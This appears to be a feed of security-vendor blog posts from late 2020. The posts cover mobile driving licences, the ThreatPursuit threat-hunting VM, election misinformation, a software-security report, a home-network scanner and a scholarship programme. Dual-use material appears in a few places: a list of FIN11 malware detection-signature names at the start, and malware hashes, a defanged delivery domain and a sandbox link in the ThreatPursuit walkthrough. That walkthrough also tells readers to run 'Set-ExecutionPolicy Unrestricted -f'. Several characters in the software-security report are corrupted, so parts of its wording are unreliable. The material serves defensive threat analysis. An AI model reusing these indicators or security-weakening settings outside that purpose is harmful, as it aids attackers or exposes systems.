  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT

Privacy-preserving features in the Mobile Driving License

In the United States and other countries a Driver's License is not only used to convey driving privileges, it is also commonly used to prove identity or personal details.

Presenting a Driving License is simple, right? You hand over the card to the individual wishing to confirm your identity (the so-called “Relying Party” or “Verifier”); they check the security features of the plastic card (hologram, micro-printing, etc.) to ensure it’s not counterfeit; they check that it’s really your license, making sure you look like the portrait image printed on the card; and they read the data they’re interested in, typically your age, legal name, address etc. Finally, the verifier needs to hand back the plastic card.

Most people are so familiar with this process that they don’t think twice about it, or consider the privacy implications. In the following we’ll discuss how the new and soon-to-be-released ISO 18013-5 standard will improve on nearly every aspect of the process, and what it has to do with Android.

Mobile Driving License ISO Standard

The ISO 18013-5 “Mobile driving licence (mDL) application” standard has been written by a diverse group of people representing driving license issuers (e.g. state governments in the US), relying parties (federal and state governments, including law enforcement), academia, industry (including Google), and many others. This ISO standard allows for construction of Mobile Driving License (mDL) applications which users can carry in their phone and can use instead of the plastic card.

Instead of handing over your plastic card, you open the mDL application on your phone and press a button to share your mDL. The Verifier (aka “Relying Party”) has their own device with an mDL reader application and they either scan a QR code shown in your mDL app or do an NFC tap. The QR code (or NFC tap) conveys an ephemeral cryptographic public key and hardware address the mDL reader can connect to.

Once the mDL reader obtains the cryptographic key it creates its own ephemeral keypair and establishes an encrypted and authenticated, secure wireless channel (BLE, Wifi Aware or NFC)). The mDL reader uses this secure channel to request data, such as the portrait image or what kinds of vehicles you're allowed to drive, and can also be used to ask more abstract questions such as “is the holder older than 18?”

Crucially, the mDL application can ask the user to approve which data to release and may require the user to authenticate with fingerprint or face — none of which a passive plastic card could ever do.

With this explanation in mind, let’s see how presenting an mDL application compares with presenting a plastic-card driving license:

  • Your phone need not be handed to the verifier, unlike your plastic card. The first step, which requires closer contact to the Verifier to scan the QR code or tap the NFC reader, is safe from a data privacy point of view, and does not reveal any identifying information to the verifier. For additional protection, mDL apps will have the option of both requiring user authentication before releasing data and then immediately placing the phone in lockdown mode, to ensure that if the verifier takes the device they cannot easily get information from it.
  • All data is cryptographically signed by the Issuing Authority (for example the DMV who issued the mDL) and the verifier's app automatically validates the authenticity of the data transmitted by the mDL and refuses to display inauthentic data. This is far more secure than holograms and microprinting used in plastic cards where verification requires special training which most (human) verifiers don't receive. With most plastic cards, fake IDs are relatively easy to create, especially in an international context, putting everyone’s identity at risk.
    • The amount of data presented by the mDL is minimized — only data the user elects to release, either explicitly via prompts or implicitly via e.g. pre-approval and user settings, is released. This minimizes potential data abuse and increases the personal safety of users.

      For example, any bartender who checks your mDL for the sole purpose of verifying you’re old enough to buy a drink needs only a single piece of information which is whether the holder is e.g. older than 21, yes or no. Compared to the plastic card, this is a huge improvement; a plastic card shows all your data even if the verifier doesn’t need it.

      Additionally, all of this information is available via a 2D barcode on the back so if you use your plastic card driving license to buy beer, tobacco, or other restricted items at a store it’s common in some states for the cashier to scan your license. In some cases, this means you may get advertising in the mail but they may sell your identifying information to the highest bidder or, worst case, leak their whole database.

These are some of the reasons why we think mDL is a big win for end users in terms of privacy.

One commonality between plastic-card driving licences and the mDL is how the relying party verifies that the person presenting the license is the authorized holder. In both cases, the verifier manually compares the appearance of the individual against a portrait photo, either printed on the plastic or transmitted electronically and research has shown that it’s hard for individuals to match strangers to portrait images.

The initial version of ISO 18013-5 won’t improve on this but the ISO committee working on the standard is already investigating ways to utilize on-device biometrics sensors to perform this match in a secure and privacy-protecting way. The hope is that improved fidelity in the process helps reduce unauthorized use of identity documents.

mDL support in Android

Through facilities such as hardware-based Keystore, Android already offers excellent support for security and privacy-sensitive applications and in fact it’s already possible to implement the ISO 18013-5 standard on Android without further platform changes. Many organizations participating in the ISO committee have already implemented 18013-5 Android apps.

That said, with purpose-built support in the operating system it is possible to provide better security and privacy properties. Android 11 includes the Identity Credential APIs at the Framework level along with a Hardware Abstraction Layer interface which can be implemented by Android OEMs to enable identity credential support in Secure Hardware. Using the Identity Credential API, the Trusted Computing Base of mDL applications does not include the application or even Android itself. This will be particularly important for future versions where the verifier must trust the device to identify and authenticate the user, for example through fingerprint or face matching on the holder's own device. It’s likely such a solution will require certified hardware and/or software and certification is not practical if the TCB includes the hundreds of millions of lines of code in Android and the Linux kernel.

One advantage of plastic cards is that they don't require power or network communication to be useful. Putting all your licenses on your phone could seem inconvenient in cases where your device is low on battery, or does not have enough battery life to start. The Android Identity Credential HAL therefore provides support for a mode called Direct Access, where the license is still available through an NFC tap even when the phone's battery is too low to boot it up. Device makers can implement this mode, but it will require hardware support that will take several years to roll out.

For devices without the Identity Credential HAL, we have an Android Jetpack which implements the same API and works on nearly every Android device in the world (API level 24 or later). If the device has hardware-backed Identity Credential support then this Jetpack simply forwards calls to the platform API. Otherwise, an Android Keystore-backed implementation will be used. While the Android Keystore-backed implementation does not provide the same level of security and privacy, it is perfectly adequate for both holders and issuers in cases where all data is issuer-signed. Because of this, the Jetpack is the preferred way to use the Identity Credential APIs. We also made available sample open-source mDL and mDL Reader applications using the Identity Credential APIs.

Conclusion

Android now includes APIs for managing and presenting with identity documents in a more secure and privacy-focused way than was previously possible. These can be used to implement ISO 18013-5 mDLs but the APIs are generic enough to be usable for other kinds of electronic documents, from school ID or bonus program club cards to passports.

Additionally, the Android Security and Privacy team actively participates in the ISO committees where these standards are written and also works with civil liberties groups to ensure it has a positive impact on our end users.

Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine

Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats within a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM.

ThreatPursuit Virtual Machine (VM) is a fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly. The threat intelligence analyst role is a subset and specialized member of the blue team. Individuals in this role generally have a strong impetus for knowing the threat environment. Often their traits, skills and experiences will vary depending on training and subject matter expertise.

Their expertise may not be technical and may include experiences and tradecraft earned by operating within a different domain (e.g., geospatial, criminal, signals intelligence, etc.). A key aspect of the role may include the requirement to hunt, study and triage previously undiscovered or recently emerging threats by discerning data for evil. Threat analysts apply a variety of structured analytical methods in order to develop meaningful and relevant products for their customers.

With this distribution we aim to enable users to:

  • Conduct hunting activities or missions
  • Create adversarial playbooks using evidence-based knowledge
  • Develop and apply a range of analytical products amongst datasets
  • Perform analytical pivoting across forensic artifacts and elements
  • Emulate advanced offensive security tradecraft
  • Enable situational awareness through intelligence sharing and reporting
  • Applied data science techniques & visualize clusters of symbolic data
  • Leverage open intelligence sources to provide unique insights for defense and offense

Akin to both FLARE-VM and Commando VM, ThreatPursuit VM uses Boxstarter, Chocolatey and MyGet packages to install software that facilitates the many aspects related to roles performed by analysts. The tools installed provide easy access to a broad range of tooling, including, but not limited to, threat analytics, statistics, visualisation, threat hunting, malware triage, adversarial emulation, and threat modelling. Here are some of the tools, but there are many more:

For a full list of tools, please visit our GitHub repository.

Installation

Similar to FLARE-VM and Commando VM, it's recommended to install ThreatPursuit VM in a virtual machine. The following is an overview of the minimal and recommended installation requirements.

Requirements
  • Windows 10 1903 or greater
  • 60 GB Hard Drive
  • 4 GB RAM
Recommended
  • Windows 10 1903
  • 80+ GB Hard Drive
  • 6+ GB RAM
  • 1 network adapter
  • OpenGL Graphics Card 1024mb
  • Enable Virtualization support for VM
    • Required for Docker (MISP, OpenCTI)
Standard Install

The easiest way to install ThreatPursuit VM is to use the following steps. This will install all the default tools and get you finding evil in no time!

  1. Create and configure a new Windows 10 VM with the aforementioned requirements.
    • Ensure VM is updated completely. You may need to check for updates, reboot and check again until no more remain.
  2. Install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing.
  3. Take a snapshot of your machine! This allows you to always have a clean state.
  4. Download and copy install.ps1 to your newly configured VM.
  5. Open PowerShell as an administrator.

Next, unblock the install file by running: Unblock-File .\install.ps1, as seen in Figure 1.


Figure 1: Unblock-File installation script

Enable script execution by running: Set-ExecutionPolicy Unrestricted -f , as seen in Figure 2.


Figure 2: Set-ExecutionPolicy Unrestricted -f script

Finally, execute the installer script as follows: .\install.ps1

After executing install.ps1, you’ll be prompted for the administrator password in order to automate host restarts during installation as several reboots occur. Optionally, you may pass your password as a command-line argument via ".\install.ps1 -password <password>". If you do not have a password set, hitting enter when prompted will also work.

This will be the last thing you will need to do before the installation is unattended. The script will set up the Boxstarter environment and proceed to download and install the ThreatPursuit VM environment, as seen in Figure 3.


Figure 3: Installation script execution

The installation process may take upwards of several hours depending on your internet connection speed and the web servers hosting the various files. Figure 4 shows the post-installation desktop environment, featuring the logo and a desktop shortcut. You will know when the install is finished with the VM's logo placed on the background. 


Figure 4: ThreatPursuit VM desktop installed

Custom Install

Is the standard installation too much for you? We provide a custom installation method that allows you to choose which chocolatey packages get installed. For additional details, see the Custom Install steps at our GitHub repository.

Installing Additional Packages

Since ThreatPursuit VM uses the Chocolatey Windows package manager, it's easy to install additional packages not included by default. For example, entering the command cinst github as administrator installs GitHub Desktop on your system.

To update all currently installed packages to their most recent versions, run the command cup all as administrator.

Getting Started: A Use Case

As threat analysts, what we choose to pursue will depend on the priorities and requirements of our current role. Often, they vary with each threat or adversary encountered such as financial crime, espionage, issue-motivated groups or individuals. The role broadly encompasses the collection and analysis of threat data (e.g., malware, indicators of attack/compromise) with the goal of triaging the data and developing actionable intelligence. For example, one may want to produce detection signatures based on malware network communications to classify, share or disseminate indicators of compromise (IOCs) in standardized ways. We may also use these IOCs in order to develop and apply analytical products that establish clusters of analogous nodes such as MITRE ATT&CK tactics and techniques, or APT groups. On the other hand, our goal can be as simple as triaging a malware sample behavior, hunting for indicators, or proving or disproving a hypothesis. Let's look at how we might start.

Open Hunting

To start our use case, let’s say we are interested in reviewing latest threat actor activity reported for the quarter. We sign in to the Mandiant Advantage portal (Figure 5) using our public subscription to get a snapshot view of any highlighted activity (Figure 6).


Figure 5: Mandiant Advantage portal


Figure 6: Actor activity for Q3 2020

Based on Mandiant Advantage report, we notice a number of highly active APT and FIN actors. We choose to drill in to one of these actors by hovering our mouse and selecting the actor tag FIN11.

We receive a high-level snapshot summary view of the threat actor, their targeted industry verticals, associated reports and much more, as seen in Figure 7. We also may choose to select the most recent report associated with FIN11 for review.


Figure 7: FIN11 actor summary

By selecting the “View Full Page” button as seen at the top right corner of Figure 6, we can use the feature to download indicators, as seen in the top right corner of Figure 8.


Figure 8: Full FIN11 page

Within the FIN11 report, we review the associated threat intelligence tags that contain finished intelligence products. However, we are interested in the collection of raw IOCs (Figure 9) that we could leverage to pivot off or enrich our own datasets.


Figure 9: Downloaded FIN11 indicators

Using the Malware Information Sharing Platform (MISP)as our collection point, we are going to upload and triage our indicators using our local MISP instance running on ThreatPursuit VM.

Please note you will need to ensure your local MISP instance is running correctly with the configuration of your choosing. We select the “Add Event” button, begin populating all needed fields to prepare our import, and then click “Submit”, as shown in Figure 10.


Figure 10: MISP triage of events

Under the tags section of our newly created FIN11 event, we apply relevant tags to begin associating aspects of contextual information related to our target, as seen in Figure 11.


Figure 11: MISP Event setup for FIN11

We then select “Add Attribute” into our event, which will allow us to import our MD5 hashes into the MISP galaxy, as seen in Figure 12. Using both the category and type, we select the appropriate values that best represent our dataset and prepare to submit that data into our event.


Figure 12: MISP import events into FIN11 event

MISP allows for a streamlined way to drill and tag indicators as well as enrich and pivot with threat intelligence. We can also choose to perform this enrichment process within MISP using a variety of open intelligence sources and their modules, such as Mandiant Advantage, PassiveTotal, Shodan and VirusTotal. We can also achieve the same result using similar tools already packaged in ThreatPursuit VM.

Using Maltego CE, installed as part of the VM, we can automate aspects of targeted collection and analysis of our FIN11 malware families and associated infrastructure. The following are just some of the Maltego plugins that can be configured post installation to help with the enrichment and collection process:

Targeting the suspected payload, we attempt to pivot using its MD5 hash value (113dd1e3caa47b5a6438069b15127707) to discover additional artifacts, such as infrastructure, domain record history, previously triaged reports, similar malware samples, timestamps, and the rich headers.

Importing our hash into Maltego CE, we can proceed to perform a range of queries to hunt and retrieve interesting information related to our FIN11 malware, as seen in Figure 13.


Figure 13: Maltego CE querying MD5 hash

Quite quickly we pull back indicators; in this case, generic named detection signatures from a range of anti-malware vendors. Using VirusTotalAPI Public, we perform a series of collection and triage queries across a variety of configured open sources, as shown in Figure 14.


Figure 14: Automating enrichment and analysis of targeted infrastructure

A visual link has been made public for quick reference.  

With our newly identified information obtained by passively scraping those IOCs from a variety of data providers, we can identify additional hashes, delivery URLs and web command and control locations, as shown in Figure 15.


Figure 15: Maltego visualization of FIN11 dropper

Pivoting on the suspected FIN11 delivery domain near-fast[.]com, we have found several more samples that were uploaded to an online malware sandbox website AppAnyRun. Within the ThreatPursuit VM Google Chrome browser and in the Tools directory, there are shortcuts and bookmarks to a range of sandboxes to help with accessing and searching them quickly. We can use AppAnyRun to further analyze the heterogenous networks and execution behaviors of these acquired samples.

We have identified another similar sample, which is an XLS document named “MONITIORING REPORT.xls” with the MD5 hash 5d7d2371668ad4a6484f76b0b6511961 (Figure 16). Let’s attempt to triage this newly discovered sample and qualify the relationship back to FIN11.


Figure 16: VirusTotal execution report of 5d7d2371668ad4a6484f76b0b6511961

Extracting interesting strings and indicators from this sample allows us to compare these artifacts against our own dynamic analysis. If we can’t access the original malware sample, but we have other indicators to hunt with, we could also pivot on various unique characteristics and attributes (e.g., imphash, vthash, pdb string, etc...) to discover related samples.

Even without access to the sample, we can also use YARA to mine for similar malware samples. One such source to mine is using the mquery tool and their datasets offered via CERT.PL. To fast track the creation of a YARA rule, we leverage the FIN11 YARA rule provided within the FIN11 Mandiant Advantage report. Simply copy and paste the YARA rule into mquery page and select “Query” to perform the search (Figure 17). It may take some time, so be sure to check back later (here are the results).


Figure 17: mquery YARA rule hunting search for FIN11 malware

Within our mquery search, we find a generic signature hit on Win32_Spoonbeard_1_beta for the MD5 hash 3c43d080b5badfdde7aff732c066d1b2. We associate this MD5 hash with another sandbox, app.any.run, at the following URL:

  • https://app.any.run/tasks/19ac204b-9381-4127-a5ac-d6b68e0ee92c/

As seen in Figure 18, this sample was first uploaded on May 2, 2019, with an associated infection chain intact.

Figure 18: AppAnyRun Execution Report on 3c43d080b5badfdde7aff732c066d1b2

We now have a confident signature hit, but with different named detections on the malware family. This is a common challenge for threat analysts and researchers. However we have gained interesting information about the malware itself such as its execution behavior, encryption methods, dropped files, timelines and command and control server and beacon information. This is more than enough for us to pivot across our own datasets to hunt for previously seen activities and prepare to finalize our report.

Once we are confident in our analysis, we can start to model and attribute the malware characteristics. We can leverage other threat exchange communities and intelligence sources to further enrich the information we collected on the sample. Enrichment allows the analysts to greater extrapolate context such as timings, malware similarity, associated infrastructures, and prior targeting information. We will briefly add our content into our MISP instance and apply tags to finalize our review.

We may wish to add MITRE ATT&CK tags (Figure 19) relevant across the malware infection chain for our sample as they could be useful from a modelling standpoint.


Figure 19: MITRE ATT&CK tags for the malware sample

Final Thoughts

We hope you enjoyed this basic malware triage workflow use-case using ThreatPursuit VM. There are so many more tools and capabilities within the included toolset such as Machine learning (ML) and ML algorithms, that also assist threat hunters by analyzing large volumes of data quickly. Check out some of FireEye’s ML blog posts here.

For a complete list of tools please see the ThreatPursuit VM GitHub repository. We look forward to releasing more blog posts, content and playbooks as our user base grows.

And finally, here are some related articles that might be of interest.

Malware Analysis

Digital Forensics

Intelligence Analysis and Assessments

CyberWeek: Working Together to Improve Cybersecurity

The annual CyberWeek festival, hosted by CyberScoop, brings together people and organizations within the cybersecurity community, as well as C-suite leaders from technology-based industry, academia, and government, for the purpose of exchanging information, sharing best practices and discussing how to protect against and overcome cyberthreats facing the nation. This year, the event turned digital and provided a multitude of virtual conferences and seminars, for the attendees, over the course of a week from October 19 to October 23. The Technology Partnerships Office (TPO) at NIST attended this

Election 2020: Lookout for Fake News Before and After the Election

U.S. Elections

 

Election 2020: Keep on the Lookout for Fake News Before and After the Election

As the news and conversations leading up to Election Day intensify, and with early voting already in full swing, the flood of misinformation and outright disinformation online continues—and will undoubtedly continue in the days after as the results are tabulated and announced.

Perhaps you’ve seen some instances of it yourself. For instance, one recent news story reported that numerous legitimate social media accounts have shared misinformation about the vote. An example: photos of old, empty election envelopes that were properly disposed of after the 2018 election, used to make the false claim that they were uncounted votes from the 2020 election. It’d be naïve for us to think that postings like this, and others, would suddenly come to a halt on Election Day.

We can expect election misinformation to continue even after Election Day

I touched upon this topic in my earlier blog about how misinformation online can undermine our election, yet it’s worthy of underscoring once again. It’s easy for our attention to focus on the days leading up to the election, however, this election stands to be like few others as the high volume of mail-in ballots may keep us from knowing who the certified victor is for possibly weeks after Election Day.
How that timeline plays out in practice remains to be seen, yet we should all prepare ourselves for a glut of continued misinformation and disinformation that aims to cloud the process. Feeds will get filled with it, and it’ll be up to us to make sense of what’s true and what’s false out there.

Who is fact checking posts on social media sites?

Sadly, much of onus for fact-checking will fall on us, particularly when 55% of Americans say they “often” or “sometimes” get their news via social media. There are a few reasons why:

• First, social media platforms are new to fact-checking and their processes are still developing, particularly around the transparency of their fact-checking methodology;
• Secondly, corporate leadership of the two major social media platforms have stated differing views about fact checking on their platforms;
• And third, the sheer volume of posts that these platforms pump out in any given day (or minute!) make it difficult to fact-check posts at scale.

Where does that leave us? In unprecedented times.

Historically, we’ve always had to be savvy consumers of news, where a balanced diet of media consumption allowed us to develop a clearer picture of events. Yet now, in a time of unfiltered social media, news comes to us from a multitude of publishers, bloggers, and individuals. And within that mix, it’s difficult to immediately know who the editorial teams behind those stories are—what their intentions, credentials, and leanings are—and if they’re drawing their information from bona fide, verified sources. The result is that we must read and view everything today with an increased level of healthy skepticism.

Fact-checking your news

That takes work, yet my recent blog on How to Spot Fake News and Misinformation in Your Social Media Feed offers you a leg up with several pointers to help you sniff out potential falsehoods.
In addition, here’s a short list of fact-checking resources that you can turn to when something questionable comes up in your feed. Likewise, they make for good browsing even if you don’t have a specific story that you want to check up on. You can keep these handy:

PolitiFact from the Poynter Institute
FactCheck.org from the Annenberg Public Policy Center
AP News Fact Check from the Associated Press
Reuters Fact Check from Reuters News
Snopes.com from Snopes Media Group

Stay vigilant

With the election just days away and a result that may not be declared at the end of Election Day, we all need to scrutinize the news that presents itself to us, particularly on social media. Fact-checking what you see and read, along with cross-referencing it with multiple, reputable sources, will help you get the best information possible—which is absolutely vital when it comes time to cast your ballot.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election 2020: Lookout for Fake News Before and After the Election appeared first on McAfee Blogs.

Announcing the 11th Volume of Our State of Software Security Report

Today, we released the 11th volume of our annual State of Software Security (SOSS) report. This report, based on our scan results, always offers an abundance of insights and information about software vulnerabilities ??? what they are, what???s causing them, and how to address them most effectively. This year is no different.

With last year???s SOSS Volume 10, we spent some time looking at how much things had changed in the decade spanning Volume 1 to Volume 10. With Volume 11, we are going to look forward and consider the direction software development is headed. We are not trying to decide if we are doing better or worse than before, but looking at what kind of impact the decisions developers make have on software security.

Some key takeaways:

Most applications are vulnerable. Our analysis this year found that among 130,000 apps, 76 percent had at least one security flaw. But in the good news department, most apps do not have severe vulnerabilities. Only 24 percent had high-severity security flaws. Back to the bad news: fix rate is still an issue ??? half of security findings are still open 6 months after discovery.

Open source code is expanding the attack surface. Applications increasingly include open source libraries; in fact, many now include more open source than first-party code. This year, we found that 97 percent of a typical Java application is made up of third-party code. And when we looked at our analysis of open source code through Software Composition Analysis vs. first-party code through Static Analysis, we found that almost one-third of all applications have more findings in third-party libraries than in the native code base.

There are ways to ???nurture??? software security, even if the ???nature??? of your software is less than ideal. This year, we thought about what leads to the state of software security ??? is it ???nature??? or ???nurture???? Is it the attributes of the app that the developer inherits ??? its security debt, its size ???or is it the actions of the developers ??? how frequently they are scanning for security, or how security is integrated into their processes? And if it???s ???nature,??? is there anything developers or security pros can do to improve security outcomes? This year???s research unearthed some surprising ??? and promising ??? data surrounding ways to ???nurture??? the security of your applications, even if the ???nature??? is less than ideal. For example, those who scan via API (and therefore are integrating and automating security testing) shorten the time to address half their flaws by 17.5 days.

See below for the data highlights, and check out theツ?full reportツ?for all the data details, plus our advice on how to use the story told by the numbers to improve your own application security program.

Trend Micro HouseCall for Home Networks: Giving You a Free Hand in Home Network Security

Remember when only desktop computers in our homes had connections to the internet? Thanks to the latest developments in smart device technology, almost everything now can be connected— security cameras, smart TVs, gaming consoles, and network storage, to name just a few. While a home network provides lots of benefits, it can also expose us to safety and privacy risks.

But checking for those risks need not be costly. How about a network security checker available for free? Yes, you read that right. Trend Micro’s free Housecall for Home Networks (HCHN) scans the connected devices in your home network and detects those that pose security risks. And in doing so, it gives you a sense for what real network security entails. We have a solution for that also.

Want to know more?

Trend Micro HCHN uses intelligent network scanning technology to scan the devices connected to your home network for vulnerabilities. These can range from a low risk type—such as an easily identifiable Wi-Fi Name that hackers can use to attack your router and home network—to high risk types, such as SSL-Poodle (for man-in-the-middle attacks), Shellshock (for remote code execution attacks), Heartbleed (which puts website passwords at risk) and WannaCry (which is a Windows ransomware cryptoworm). These and other vulnerabilities can be detected through the help of this handy tool.

In addition, HCHN checks devices for open ports that are usually targeted by hackers and malware and can be exploited for cybercriminal activities. Examples include ports 20 and 21, used via the File Transfer Protocol (FTP) to transfer files between an FTP client (20) and FTP server (21), which can deliver a multitude of vulnerabilities to the internet; as well as port 23, which sends data in Clear Text, which can be used by attackers to listen in, watch for credentials, or inject commands, enabling the hacker to perform Remote Code Executions.

Moreover, HCHN gives you a report about the status of your home network and its connected devices and offers helpful advice for keeping your network and devices secure.

Lastly, HCHN provides you a notification when:

  • A new device joins the network
  • Connecting to a new network
  • A new vulnerability is found in the network.

 

Ready to install?

HCHN is easy to use and accessible from any device, be it Windows (7, 8 and 10), MacOS (10.12 or later), Android (5.0 or later) or iOS (8.0 or later). For your computer hardware, you just need to have Intel Pentium or compatible processor, a 256MB of RAM (512MB recommended) with at least 50MB available disk space and you’re set.

  • Download and install the application from the Web, Google Play Store or Apple App Store.
  • During install, accept the Privacy and Personal Data Collection Disclosure Agreement which indicates the necessary information gathered in order to check for and identify vulnerabilities in devices connected to your home network and you’re good to go.
  • Once installed, inspect your home network’s security risk exposure by clicking (applies to Windows and MacOS) or tapping (applies to Android and iOS) Scan Now. You’re then presented with the result.

 

Are my home network and connected devices safe?

Here’s a few scans we did–from a Windows PC, then from and Android and iOS devices.

When the scan is complete on a Windows computer it shows two tabs: Home Network and Devices.

The first tab indicates a snapshot of your home network, identifying the devices at risk.

Figure 1. HouseCall for Home Networks – Home Network

The second tab indicates a list of the devices scanned and the details of any device risks found.

Figure 2. HouseCall for Home Networks – Device List

On the Android device, once the scan has finished, the screen will reveal any security risks detected. You can view the issue to see more details of the security risk in your home network. You can then slide to the next panel and check to verify all the connected devices on your network.

Figure 3. HCHN – At Risk Devices

Similarly, upon completing the network scan from an iOS device, the app will display the risk that needs your attention. Just as with the Android device, you can move to the next panel to review the list of connected devices that were identified by Trend Micro HCHN.

Figure 4. HCHN – Needs Attention

A Few Reminders and Recommendations …

  • Use HCHN regularly to check the posture of your home network security, since new vulnerabilities and network risks may appear in the device after a time due to lack of firmware updates or a failure by the manufacturer to address a newfound risk.
  • Ensure that the devices (including mobile devices such as phones or tablets) are on and connected to the network when a scan is performed.
  • Some security products installed from the device initiating the network scan might detect the scan as suspicious and show a warning message or block user access. This doesn’t mean that HCHN is a malicious application. Add HNCN to your security product’s exception list, so it’s allowed to examine your network and connected devices for security risks.
  • The HNCN app does not automatically block dangerous network traffic or suspicious devices from connecting to your network. For that, and more home network security features, you should increase your home’s network protection with Trend Micro Home Network Security. To that we now turn.

What Home Network Security Provides

While a free network scan helps to determine the underlying dangers in your home network, to fully protect not only your home network but your family, you should consider Trend Micro Home Network Security (HNS) as a permanent enhancement to your network. It can shield your home against a wide variety of threats, including network intrusions, risky remote connections, phishing, ransomware, harmful websites and dangerous downloads. Additional features include the following:

  • New Device Approval gives you control over the devices that are allowed access to your home network.
  • Remote Access Protection limits malicious individuals from using remote desktop programs to connect to your devices at home.
  • Voice Control lets you issue voice commands to Alexa or Google Home to perform specific functions on HNS such as conducting a scan, obtaining your home network’s security status, pausing internet usage, disabling internet access for a user, and so on.
  • Parental Controls’ flexible and intuitive feature set, comprised of Filtering, Inappropriate App Used, Time Limits and Connection Alerts, can help any parent to provide a safe and secure internet experience for their kids. Combined with Trend Micro Guardian, parents can extend these protections to any network their children connect to, Wi-Fi or cellular.

Download the HNS App on your Android or iOS device to give it a spin. Note that the HNS App, when used by itself, performs the same functions as the HCHN app on those devices.

If you like what you see, pair the HNS App to a Home Network Security Station to get the full range of protections. (Note too that once you do, the HCHN App will be disabled on all your devices and network and replaced by Home Network Security.)

Figure 5. Home Network Security (HNS) App

Figure 6. HNS App Paired with the Home Network Security Station

Final Words

Home networks come with security risks. As the tech-savvy member of your household, you need to be aware of those risks. Using Trend Micro HouseCall for Home Networks (HCHN), you’ll be able to know which devices are connected to your home Wi-Fi network and whether these devices bear security risks that can be exploited by hackers and malicious software. Moreover, you’ll be provided with suggestions, in case your devices are found vulnerable.

However, just knowing the security risks is only half the battle in protecting your home network. You’ll need a more robust system that can automatically block suspicious and malicious traffic and do more— such as protecting your child’s online safety. Trend Micro Home Network Security (HNS) can address your home network’s security, even as it monitors your home network, prevents intrusions, blocks hacking attempts and web threats, and protects your family’s privacy, while keeping the internet safe for your kids.

Download Trend Micro Housecall for Home Networks from the Web, Google Play Store or Apple App Store to give it a try.

Go to Trend Micro Home Network Security to get more details on the solution, or to buy.

The post Trend Micro HouseCall for Home Networks: Giving You a Free Hand in Home Network Security appeared first on .

Spotlighting McAfee’s Women in Technology Scholarship Recipients

Working at McAfee is so much more than fighting off cyber-attacks; it’s also about learning valuable life lessons and fostering meaningful relationships. Recipients of our Women in Technology (WIT) Scholarship learned firsthand the immeasurable growth and invaluable experience gained at McAfee through their participation in the summer internship program in Cork, Ireland.

As we accept applications for prospective scholars from now until November 20, we are reminded of the positive impact this program has had on previous participants. The program offers 3000 Euro annum for the chosen student per year of the course, a summer internship at McAfee Cork, and a mentor who offers guidance to the scholar on managing their academic career.

From building professional relationships to developing the skills needed for a successful career in STEM-related fields through mentorships and training, four Women in Technology (WIT) Scholarship winners share their unique experiences in the program:

Alison, Mathematical Sciences

The WIT Scholarship has been incredible for me in so many ways—from the practical experience of working at McAfee to the inspiration and support that I have received from my mentors and other brilliant people during my time here. I was able to put the monetary support I received towards studying at UC San Diego in 2019. The scholarship has opened so many doors for me.

The skills I have learned at McAfee have helped me with my University projects. I had the chance to improve my coding abilities, learn new languages, and use statistical tools. In an educational environment, you sometimes miss the “Why are we doing this?” aspect of learning a new skill. Through my projects at McAfee, I understood the practical implementation of coding and statistics, which gave me a greater appreciation for what I was learning in school and motivated me to further improve my skills.

Clodagh, Financial Maths and Actuarial Science

During my internship, I had the chance to work with the Database Security team. I really felt like a member of the team and was made to feel valued. Everyone in McAfee was extremely friendly and approachable.

In addition to receiving the scholarship, I was lucky enough to receive two mentors. My initial mentor Ciara was incredibly thoughtful, motivational, and truly inspiring. She encouraged me to take part in extracurricular activities, so I became a committee member of the Math society in UCC. She provided me with numerous inspirational books and was always readily available to answer any questions. At the end of my second-year scholarship, I received a new mentor: Jill. She  was incredibly helpful, kind, and a valuable resource in my career progression.

My plan for the future is to learn more coding languages and hopefully complete another internship with McAfee! It is truly an amazing experience.

Jade, Mathematical Sciences

I had the opportunity to work alongside the Applied Data Science team. They gave me lots of advice and enlightened me on their own career journeys. Their experiences gave me confidence and reassurance in my course choice and I realized that there are so many career opportunities in programming. I’ve learned so many new skills, some of which were not covered in school, and I feel like I have a true advantage in the industry.

I have learned so much about working in a multinational company. I participated in the daily stand-ups with the team. I learned about sprint demos as well as the Agile and Waterfall methods. I attended all-hands meetings, which was a brand-new experience for me. I learned how to research effectively and swiftly pass that information onto my team. I also participated in an internal dataset competition; First, learning about Machine Learning and then building my own. I managed to host my own meeting for others who wanted to get involved, which was nerve-wracking but I’m glad I did it.

Aine, Data Science & Analytics

I’m incredibly grateful for the vast support and opportunities that I have received through my learning path in STEM to date, particularly my involvement in the McAfee WIT Scholarship Program. My experience with McAfee has  further enriched my educational experience and cultivated my passion for science and technology.  As a result of receiving this scholarship, I’ve developed a particular interest in the application of data science in cyber-security. Cyber crime and cyber threats have an ever-increasing potential to cause serious harm to our society so I’m fascinated by the application of data science, machine learning and artificial intelligence in saving lives.

Want to become a 2020 WIT Scholar? Apply now!

Know any future scientists? The closing date to apply for the WIT Scholarship is Friday, November 20, 2020. For more details on applying, click here.

Search Career Opportunities with McAfee

Interested in joining our team? We’re hiring! Apply now.

Stay Connected

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

 

The post Spotlighting McAfee’s Women in Technology Scholarship Recipients appeared first on McAfee Blogs.

Cruel Ghouls: New Digital Scams Target Every Age Group

Halloween Scams

Cruel Ghouls: New Digital Scams Target Every Age Group

There are few situations more personal than a distressed family member calling to ask for financial help. But personal is precisely the angle bad actors are taking these days in scams that target both the young and old.

